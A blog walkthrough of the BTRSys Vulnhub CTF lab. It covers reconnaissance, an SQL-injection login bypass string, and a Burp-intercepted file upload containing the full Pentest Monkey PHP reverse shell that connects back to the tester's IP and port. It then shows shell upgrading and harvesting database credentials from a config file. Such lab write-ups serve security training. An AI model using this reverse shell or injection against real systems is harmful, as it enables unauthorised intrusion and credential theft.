BTRSys - Vulnhub CTF Challenge Walkthrough

in bestvulnhubhackingchallenges •  6 years ago 


BTRSys is a Boot2Root Challenge and is available at Vulnhub. This is a really interesting CTF challenge, especially as its Client Side Restrictions using JavaScript.

In this walkthrough, I'll be using Parrot Security OS but you can use any other Linux distro.

Start the machine and use Netdiscover to determine its IP. Then register this IP Address to your local DNS file "/etc/hosts" so you don't have to remember its IP.

sudo netdiscover -r [IP/Subnet]
sudo nano /etc/hosts

 

Run a full port Nmap scan.


 

An HTTP Server is running. Here is the index page


 

There is no "robots.txt" file, so run a Nikto scan on the Server.

nikto -h http://btr.local/

 

Nikto has found a login page at "/login.php". Open your browser and go to the page


 

We have no credentials to log in to this page. So let's look at the Source Code.


 

This script says that username must contain "@btrisk.com" and the password should not be a single quote. That gives us a hint about SQL Injection so let's try that. [a' or 1=1;#] worked as the password.


 

We are in.


 

This page doesn't allow us to upload any PHP file and this is disabled using JavaScript. So we can try to intercept the request using Burp Suite and modify the file with our PHP reverse shell for Pentest Monkey.

Just open Burpsuite and set up a Burp proxy then try to upload the file.

POST /gonder.php HTTP/1.1
Host: 192.168.43.214
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.214/personel.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1242813403962887366948510608
Content-Length: 2257

-----------------------------1242813403962887366948510608

Content-Disposition: form-data; name="dosya"; filename="php-reverse-shell.php"

Content-Type: image/png


<?php echo 'HidWQ5qP'; ?> <?php set_time_limit (0);$VERSION = "1.0";$ip = "192.168.43.2";$port = 1234;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = "uname -a; w; id; /bin/sh -i";$daemon = 0;$debug = 0;if (function_exists("pcntl_fork")) { $pid = pcntl_fork();if ($pid == -1) { printit("ERROR: Cant fork");exit(1);} if ($pid) { exit(0);} if (posix_setsid() == -1) { printit("Error: Cant setsid()");exit(1);} $daemon = 1;} else {printit("WARNING: Failed to daemonise.This is quite common and not fatal.");}chdir("/");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { printit("$errstr ($errno)");exit(1);}$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Cant spawn shell"); exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;} if (feof($pipes[1])) {printit("ERROR: Shell process terminated"); break;} $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);} if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input");fwrite($sock, $input);} if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) { if (!$daemon) { print "$string\n";}}?> <?php echo 'Ot4Fw56d'; ?>


-----------------------------1242813403962887366948510608--

 

Now, Access this PHP reverse shell from URL "http://btr.local/uploads/php-reverse.shell.php" and you'll get a reverse shell on your Netcat listener.


 

Spawn a pty shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

 

We got a lower shell but we are not root yet. After some research, you'll see there is a file "config" in "/var/www/html" which contains database passwords.


 

We got some login credentials for MySQL database. Now try to connect to MySQL

mysql -uroot -p -Ddeneme

 

We got a password. Now try logging in.


 

Other users failed but root worked.

Posted from my blog with SteemPress : https://latesthackingnews.com/2018/09/23/btrsys-vulnhub-ctf-challenge-walkthrough/

bestvulnhubhackingchallenges freehackingchallenges hackingchallengelhn latesthackingnewschallenges lhnhackchallenge
6 years ago by

Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

  • Disagreement on rewards
  • Fraud or plagiarism
  • Hate speech or trolling
  • Miscategorized content or spam

Submit
$0.00
    1 vote
    0
    Authors get paid when people like you upvote their post.
    If you enjoyed what you read here, create your account today and start earning FREE STEEM!